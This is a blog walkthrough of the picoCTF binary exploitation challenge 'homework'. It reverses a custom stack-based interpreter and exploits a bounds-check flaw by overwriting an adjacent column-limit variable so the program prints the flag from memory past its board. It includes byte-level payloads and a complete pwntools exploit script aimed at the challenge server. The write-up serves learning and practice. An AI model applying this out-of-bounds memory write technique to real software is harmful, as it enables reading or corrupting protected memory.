SJ W

Posted on Jul 5

picoCTF "homework" Walkthrough

#picoctf #ctf #ghidra #cybersecurity

Introduction

Today, we are going to go over the picoCTF challenge I have completed a few days ago, called homework, a challenge in the category of binary exploitation. It has been a while since I posted anything in this blog, and before I start the walkthrough, I would like to briefly talk about my future career in cybersecurity. Recently, I made up my mind to fully pursue a career in cybersecurity. Fully transitioning into the field of cybersecurity feels like a daunting task, but at the same time, I believe that it will help me lead a fulfilling life that I have always envisioned. Evident in my blog, the vast majority of posts are related to various CTF challenges I have completed so far, and simply, it is the most enjoyable thing for me to do in life. Along the journey, there will be a plenty of challenges and obstacles that will, at times, make me feel doubtful about accomplishing my goal, but I believe that, with strong willpower and commitment, I can overcome those and keep moving forward for the ultimate goal I set in life. Enough with my gibberish, let's go ahead with the challenge.

Unlike all the challenges I have completed and posted in this blog, this challenge is of the category of Binary Exploitation, which involves a slightly different approach than Reverse Engineering. On top of understanding how a binary works, challenges in this category require you to carefully manipulate a binary into doing something that wasn't expected of it to do. Usually in this category, there are challenges involving heap and stack overflow that alters the behaviors of a program in unexpected ways.

This challenge basically involves providing a series of strings that are fed to a custom interpreter, which executes the custom instructions that a user provides. Ultimately, what we need the binary to do is, with our carefully crafted instructions, to output the flag that we need to submit in order to complete this challenge.

Analysis

Just as usual, it all starts with statically analyzing a binary with the help of Ghidra. Let's see what it contains.

With the completion of the analysis, we wind up right at the function main, which is the starting point of the binary.

Looking at the function main, we notice a few lines that seem pretty interesting. In lines 12 and 13, the function apparently copies the content of a file flag.txt to a memory address using the scanf function. The lines 16 and 17 contain variables named rows and cols, which seem to indicate that it has to do with a matrix of 0x32 rows and 0x16 columns (50 rows and 22 columns).

As you can see, the variable board mentioned in line 19 encompasses 1100 bytes (50 * 22).

And then, we encounter a for-loop that repeats the total of 4 times maximum, which does the followings:

Accept an input of up to 22 bytes and store the input at the following address.
- Address of the variable board + (0x16 * local_14)
- The reason why the function does (0x16 * local_14) is that there are 22 columns in each row, and multiplying it to local_14 results in the very first column of a certain row. Basically, local_14 acts as a row number.
Check if the input is not accepted or the first byte of an input is the ASCII value of 0x52.
- If either one evaluates to True, then terminate the for-loop prematurely.
Calculate the length of an input.
Replace the very last character of an input with a null byte.
- So, let's say you provided an input of 22 bytes. The process replaces the 22nd byte with a null byte, which turns into an input of 21 bytes. Essentially, each row is only able to contain up to an input of 21 bytes.

So, what we can gather from above is the following:

There is a board of 50 row and 22 cols that will be placed with our input. Each row contains 22 columns.
You provide an input 4 times total. If the max length of each line is 21 bytes, then you can provide inputs of up to 84 bytes.

Okay, so you place inputs to a board. What does each input do?

The "step" function

Once it exits the for-loop, it enters a do...while-loop, which seems to repeatedly call the function step. Once the function returns the value of 0, it exits the loop, thus terminating the process. Let's see what it does.

The function is just essentially a switch statement with a bunch of cases, each of which represents a unique instruction that a process executes. Notably, many of these instructions utilize the variable called stack, which is used to store data needed to execute instructions. To save some time on trying to figure out what each instruction does, I copied the entire thing and asked an LLM to tell me what each of them does. Here is a response from it:

Here is a breakdown of what each case in the switch statement does, identified by its hexadecimal value and corresponding ASCII character:

case 0x21 ('!') - Logical NOT:
Pops the top value from the stack. If the value is 0, it pushes 1 onto the stack. Otherwise, it pushes 0.

case 0x24 ('$') - Pop:
Discards the value at the top of the stack.

case 0x25 ('%') - Modulo:
Pops two values from the stack (let's call them a and b, where a is the top value). It then calculates b % a and pushes the result back onto the stack.

case 0x2a ('*') - Multiplication:
Pops two values (a and b) from the stack, multiplies them (b * a), and pushes the result onto the stack.

case 0x2b ('+') - Addition:
Pops two values (a and b) from the stack, adds them (b + a), and pushes the result onto the stack.

case 0x2c (',') - Output Character:
Pops a value from the stack and prints it to the console as its corresponding ASCII character.

case 0x2d ('-') - Subtraction:
Pops two values (a and b) from the stack, subtracts them (b - a), and pushes the result onto the stack.

case 0x2e ('.') - Output Integer:
Pops a value from the stack and prints it to the console as a decimal integer.

case 0x2f ('/') - Division:
Pops two values (a and b) from the stack, divides them (b / a), and pushes the integer result onto the stack.

case 0x3a (':') - Duplicate:
Duplicates the value at the top of the stack. If the stack is empty, this will result in an error.

case 0x3c ('<') - Go Left:
Sets the direction of program flow to the left. The program counter will now move left in the next step.

case 0x3e ('>') - Go Right:
Sets the direction of program flow to the right.

case 0x40 ('@') - End Program:
Terminates the program by returning 0 from the step function.

case 0x5c ('\') - Swap:
Swaps the top two values on the stack.

case 0x5e ('^') - Go Up:
Sets the direction of program flow upwards.

case 0x5f ('_') - Horizontal If:
Pops a value from the stack. If the value is 0, the direction of flow is set to the right ('>'). Otherwise, it is set to the left ('<').

case 0x60 ('') - Greater Than: 
Pops two values (aandb) from the stack. It checks if b > a. If true, it pushes 1 onto the stack; otherwise, it pushes 0.

case 0x67 ('g') - Get:
Pops a y-coordinate and then an x-coordinate from the stack. It retrieves the ASCII value of the character at that (x, y) position on the board and pushes it onto the stack.

case 0x70 ('p') - Put:
Pops a y-coordinate, an x-coordinate, and a value from the stack. It then modifies the board by placing the character corresponding to the value's ASCII code at the specified (x, y) position.

case 0x76 ('v') - Go Down:
Sets the direction of program flow downwards.

case 0x7c ('|') - Vertical If:
Pops a value from the stack. If the value is 0, the direction of flow is set downwards ('v'). Otherwise, it is set upwards ('^').

default:
This block handles any characters not explicitly covered by the other cases. It specifically checks if the character on the board is '0' (ASCII 0x30). If it is, it pushes the integer value 0 onto the stack. For any other character (e.g., '1' through '9' or other symbols not defined), it does nothing and the program counter simply moves to the next position.

So, to summarize what you can do with these instructions:

You can move around the board. Wherever you land at is exactly an instruction that an interpreter will execute.
You can add, subtract, multiply, and divide the top two values on the stack.
You can output what is on the stack, either in the form of an ASCII character or an integer.
You can duplicate the top value or swap the top two values on the stack, essentially changing their positions.
You can flip the value on the stack either from 0 to 1 or any non-zero value to 0.
Lastly, you can insert a value to a certain cell, and retrieve a value from a certain cell on the board and push it to the stack.

Mind you that, for the number 6, there is a huge caveat that limits which cell you can insert a value to or get a value from: with the help of the variable rows and cols, it forbids you to access values off the board. For example, the very logic is implemented in the if-statement of the instruction 0x67 (an instruction for pushing to the stack the value at a certain cell) from the line 162 to 167. If the top value on the stack exceeds the value of the variable rows, which is 0x32 (50), or the 2nd top value on the stack exceeds the value of the variable cols, which is 0x16 (22), it terminates a process early.

So, like I said earlier, our goal is to somehow make it output the flag for the completion of the challenge. Being aware of the fact that we can't access values off the board and that the flag we are trying to output is not on the board, how can we potentially access values off the board?

Like I said, the caveat is that both rows and cols are used to prevent access to values off the board. Can we perhaps modify either of the values in order to access values off the board?

Where Are Rows and Cols?

Going through the disassembly, I discovered that both rows and cols are located right after the board variable. Both rows and cols occupy 4 bytes each. Modifying either of those values to a value that exceeds their original values allows us to access values off the board! Let's see if we can modify them.

Above is a screenshot of the instruction 0x70, which is used to insert a value at a certain cell. The mechanism with which it chooses a cell on the board is the following:

The address of the variable board + (0x16 * row) + col.
- row is the very top value on the stack. It can be any value from 0 to 50.
- col is the 2nd top value on the stack. It can be any value from 0 to 22.

Okay, so ideally, if we were to choose a cell on the end of the board, we would need both row and col to be their respective max values. So, for (0x16 * row), let's pretend that the value of row is 50. (0x16(22) * 50) results in the value 1100. If we were to pretend that the value of col is 22, adding it to 1100 results in the value 1122.

If there are only 1100 cells on the board and we can access up to 1122 cells, we can access up to 22 extra bytes off the board, and since both rows and cols are located right after the board and within those 22 extra bytes, we can modify them!

Where Is The Flag?

Okay, since we have confirmed that the values of both rows and cols can indeed be modified, it's time to find out where the flag is located.

The flag is located somewhere after cols, and the memory for the flag spans 104 bytes. The very first address of the flag is 0x1056e0, and the very last address of the flag is 0x105747. To calculate how many bytes we need in order to access the flag, all we have to do is to subtract the very last address of the variable board from 0x105747. The very last address of the board is 0x1056ab, so it would be (0x105747 - 0x1056ab).

We need to modify the variable cols to contain the value of 156 at least in order to access the entirety of the flag.

Crafting Input

Like I said previously, we can provide up to 4 lines in total, each of which may contain up to 21 bytes. So the maximum amount of instructions that we can provide to the process amounts to 84 bytes.

Okay, so here is what we have to do basically:

Set the variable cols to a value that exceeds 156.
Repeatedly, retrieve and push to the stack each character of the flag, and output each character.

The very first instruction that the interpreter executes is the very first byte of the first input a user provides. By default, once it executes an instruction, it moves to the next cell on the right and executes the next instruction. Unless modifying the direction, once it reaches the last instruction of a row, with the help of modulus, it goes back to the first instruction of the same row.

So, since we have only 84 instructions at max to print out the entirety of the flag, it would make sense to make the most out of it by doing the following:

Above is how I decided to go about crafting the inputs in order to use as many instructions as possible, given our limitation of being able to use up to 84 instructions. Since the first instruction that the interpreter executes is the one on top-left corner, let it go over the first row until the very last column, which moves down to the next row of the same column. And then change the direction to the left and let it also cover the entirety of the row in reverse. The same pattern continues until the very last row.

In order to change the value of the variable cols, we have to calculate the exact row and column that we have to target.

As we can see in a screenshot above, right after the board is rows, which is followed by cols. So, accessing the last cell of the board requires us to set the very top value on the stack to 50 and the 2nd top value to 0, since (50 * 0x16) + 0 results in 1100. Since the cols is located 4 bytes after the last cell of the board, all we have to do is to make the 2nd top value on the stack hold the value of 4, thus resulting in (50 * 0x16) + 4.

So, let's get to crafting the first line of the input for pushing 50 to the stack.

create_50_on_the_stack = b'\x30\x21\x3a\x2b\x3a\x3a\x3a\x3a\x2b\x2b\x2b\x2b\x3a\x3a\x3a\x3a\x2b\x2b\x2b\x2b\x76'
line_1 = create_50_on_the_stack

Here is a breakdown of the instructions of the line 1 above:

\x30\x21\x3a\x2b - Push 2 to the stack
\x3a\x3a\x3a\x3a\x2b\x2b\x2b\x2b - (0x3a) Duplicate the top value on the stack 4 times and (0x2b) add the top 2 values on the stack 4 times. This means 2 becomes 10.
\x3a\x3a\x3a\x3a\x2b\x2b\x2b\x2b - Same as the one above, except 10 becomes 50.
\x76 - Move down to the same column of the next row.

Upon the executions of instructions in the first row, there is only one value on the stack, which is 50. Let's craft the 2nd line of the input.

insert_200_to_cols_1 = b'\x3c\x30\x30\x70\x30\x30\x67\x3a\x3a\x3a\x2b\x2b\x2b\x30\x30\x67\x30\x21\x3a\x2b\x76'
line_2 = insert_200_to_cols_1[::-1]

Here is a breakdown of the instructions of the line 2 above:

\x3c - Change the direction to the left, thus moving leftwards.
\x30\x30\x70 - (0x30) Push 0 twice to the stack and (0x70) write the 3rd top value on the stack to the board using the very top value on the stack as the row number and the 2nd top value on the stack as the column number.
- At this point, upon pushing 0 twice to the stack, the stack has 3 items - (50 (last), 0, 0 (top)). What this means is that we are writing 50 to the first cell of the board in the top left corner. Those values used to write to the board are popped, and the stack becomes empty.
\x30\x30\x67 - (0x30) Push 0 twice to the stack and (0x67) retrieve the value from the board and push it to the stack.
- So, right before this, we inserted the value 50 to the first cell of the board at (0, 0). We retrieve 50 from the top left corner of the board and push it to the stack, so there is only 50 on the stack at this point.
\x3a\x3a\x3a\x2b\x2b\x2b - (0x3a) Duplicate the top value on the stack 3 times and (0x2b) add the top 2 values on the stack 3 times. This means 50 becomes 200.
\x30\x30\x67 - Same as the 3rd one, retrieve 50 from the first cell of the board and push it to the stack.
\x30\x21\x3a\x2b - Push 2 to the stack.
\x76 - Move down to the same column of the next row.

Upon the executions of instructions in the second row, there are three values on the stack, (200 (last), 50, 2).

insert_200_to_cols_2 = b'\x3e\x3a\x2b\x5c\x70\x30' + b'\x3e' * 14 + b'\x76'
line_3 = insert_200_to_cols_2

Here is a breakdown of the instructions of the line 3 above:

\x3e - Change the direction to the right, thus moving rightward.
\x3a\x2b - Duplicate the top value (2) on the stack and add the top two values (2 + 2), resulting in the previous top value of 2 turning into 4.
\x5c - Swap the top two values on the stack.
- So it goes from (200 (last), 50, 4) to (200 (last), 4, 50).
\x70 - Write the 3rd top value on the stack to the board using the very top value on the stack as the row number and the 2nd top value on the stack as the column number.
- What this does is inserting 200 to the (50 * 0x16 + 4), which is where cols is located! After this, cols holds the value of 200!
\x30 - Push 0 to the stack.
\x3e (14 times) - Change the direction to the right. Basically, this doesn't do anything, and the reason why we are inserting this is that we are ready to start printing out characters with the help of the instructions on the last row.

Upon the executions of instructions in the third row, there is only one value on the stack, which is 0.

print_each_char = b'\x3c\x3a\x30\x30\x67\x67\x2c' + b'\x30\x21\x2b' + b'\x3c' * 11
line_4 = print_each_char[::-1]

The last row is where you start printing out characters. Unlike other rows, it doesn't involve moving down to the next row since there is no instruction on the next row. Using the concept of a for-loop here, we repeatedly print out characters consecutively starting from the last cell of the board to every one of the next 200 extra cells after, which include the flag we need.

Here is a breakdown of the instructions of the line 4 above:

\x3c - Change the direction to the left, thus moving leftwards.
\x3a - Duplicate the very top value on the stack. The very top value of the stack at this point is the value of the column that we will use to print out each character. With the output of each character, it increments by 1. Currently, at the outset, it holds 0.
\x30\x30\x67 - Retrieve 50 from the first cell of the board and push it to the stack.
\x67 - Retrieve the value from (50 * 0x16 + column) and push it to the stack.
\x2c - Print out the value at the top of the stack in the form of ASCII character.
\x30\x21\x2b - Push 1 to the stack and increment the column by 1.
\x3c (11 times) - Skip the rest of the row to the next iteration of the for-loop.

Here is a full script that you can use to print out the flag.

from pwn import *

# Set the target host and port
HOST = 'mars.picoctf.net'
PORT = 31689

def main():
    """
    Establishes a remote connection to the specified host and port
    using pwntools, receives initial data, and then drops into
    an interactive shell.
    """
    log.info(f"Connecting to {HOST}:{PORT}...")

    try:
        # Establish a remote connection
        # The 'remote()' function returns a 'tube' object, which can be
        # used to send and receive data.
        r = remote(HOST, PORT)
        log.success("Connection established!")

        # Receive and print initial data from the server.
        # This is useful to see any banners or prompts the binary sends
        # right after connection.
        log.info("Receiving initial data...")
        initial_output = r.recvline() # Adjust if the initial output is multi-line or not line-terminated
        log.info(f"Initial output: {initial_output.decode().strip()}")

        log.info("Dropping into interactive mode. Use Ctrl+D to exit.")

        create_50_on_the_stack = b'\x30\x21\x3a\x2b\x3a\x3a\x3a\x3a\x2b\x2b\x2b\x2b\x3a\x3a\x3a\x3a\x2b\x2b\x2b\x2b\x76'
        line_1 = create_50_on_the_stack

        insert_200_to_cols_1 = b'\x3c\x30\x30\x70\x30\x30\x67\x3a\x3a\x3a\x2b\x2b\x2b\x30\x30\x67\x30\x21\x3a\x2b\x76'
        line_2 = insert_200_to_cols_1[::-1]

        insert_200_to_cols_2 = b'\x3e\x3a\x2b\x5c\x70\x30' + b'\x3e' * 14 + b'\x76'
        line_3 = insert_200_to_cols_2

        print_each_char = b'\x3c\x3a\x30\x30\x67\x67\x2c' + b'\x30\x21\x2b' + b'\x3c' * 11
        line_4 = print_each_char[::-1]

        r.sendline(line_1)
        r.sendline(line_2)
        r.sendline(line_3)
        r.sendline(line_4)

        r.interactive()

    except Exception as e:
        log.error(f"Failed to connect or interact: {e}")
        # In case of an error, ensure the connection is closed if it was opened
        if 'r' in locals() and r.connected:
            r.close()

    finally:
        # Ensure the connection is closed when the script finishes or exits
        if 'r' in locals() and r.connected:
            r.close()
            log.info("Connection closed.")

if __name__ == "__main__":
    main()

Upon executing the script, we get the flag we need for the completion of the challenge!

It wasn't as bad in my thought overall, except for crafting the inputs part, where I struggled only a bit. Thank you for reading this walkthrough, and will post more walkthroughs of other challenges as well soon. Thank you!

DEV Community